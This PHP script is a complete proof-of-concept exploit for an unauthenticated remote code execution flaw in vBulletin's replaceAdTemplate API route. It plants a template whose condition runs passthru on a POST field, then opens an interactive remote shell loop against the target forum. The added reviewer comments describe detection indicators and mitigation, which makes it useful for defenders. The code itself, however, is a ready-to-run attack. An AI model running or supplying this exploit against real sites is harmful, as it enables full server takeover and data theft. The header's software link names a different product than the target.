vBulletin replaceAdTemplate Remote Code Execution
<?php

/*
-----------------------------------------------------------------
vBulletin (replaceAdTemplate) Remote Code Execution Vulnerability
-----------------------------------------------------------------

author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com (sic; the product targeted below is vBulletin)

+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+

[-] Technical Writeup:

https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce
*/

// Reviewer summary (defensive reading of this proof of concept):
//   1. One POST to the base URL asks the "ad/replaceAdTemplate" API route to
//      store a template whose <vb:if> condition is PHP code.
//   2. Further POSTs ask the render route for that template, passing a "cmd"
//      field that the stored condition hands to passthru().
// The script sets no cookie, token or credential on the cURL handle, so both
// steps are sent without authentication.
// Affected versions and the root cause are not stated in this file; take them
// from the write-up linked in the header and from the vendor's advisories.

// Remove the execution time limit and report fatal errors only.
set_time_limit(0);
error_reporting(E_ERROR);

print "\n+---------------------------------------------------------------------+";
print "\n| vBulletin (replaceAdTemplate) Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";

// All HTTP traffic below goes through the cURL extension.
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");

// Exactly one argument is accepted: the base URL of the forum.
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/vb/";
print "\nExample....: php $argv[0] https://vbulletin.com/\n\n";
die();
}

// Form fields of the first request.
// Detection: a "routestring" of ajax/api/ad/replaceAdTemplate arriving from a
// client with no session, and a "template" field containing a <vb:if> whose
// condition calls a function, are the two indicators visible here.
// NOTE(review): "location" => "rce" together with the later route
// "ajax/render/ad_rce" suggests the stored template is named "ad_" + location;
// confirm against the write-up before using it as a search key.
$params = [
"routestring" => "ajax/api/ad/replaceAdTemplate",
"styleid" => "1",
"location" => "rce",
"template" => "<vb:if condition='\"passthru\"(\$_POST[\"cmd\"])'></vb:if>"
];

$ch = curl_init();

// The request URL is the base URL as given; the route is carried only in the
// form-encoded POST body. Access logs that record just the request path will
// therefore not show the route -- body logging or WAF inspection is needed.
curl_setopt($ch, CURLOPT_URL, $argv[1]);
// Certificate and host-name verification are both switched off, so the peer's
// identity is never checked.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));

// The script treats a response body that is exactly the four characters "null"
// as confirmation that the template was written; anything else aborts.
// Incident response: a response of that form to the route above is worth
// correlating with a review of stored ad templates.
if (curl_exec($ch) !== "null") die("\n[-] Exploit failed, unable to create template!\n\n");

// From here on every request targets the render route for the stored template.
$params = ["routestring" => "ajax/render/ad_rce"];

// Interactive loop: one line read from the console becomes the "cmd" POST field
// of one request; typing "exit" ends the loop.
while (1)
{
print "\nvBulletin-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$params["cmd"] = $cmd;
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
// The pattern captures whatever precedes the first {"template": in the body and
// prints it; no match ends the script. Detection: a render response in which
// non-JSON bytes precede the JSON object, or a render request carrying a "cmd"
// field, matches the traffic this loop produces.
preg_match('/(.+)\{"template":/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}
// Mitigation belongs on the server side: apply the vendor's security patches
// and audit stored templates for conditions like the one built above.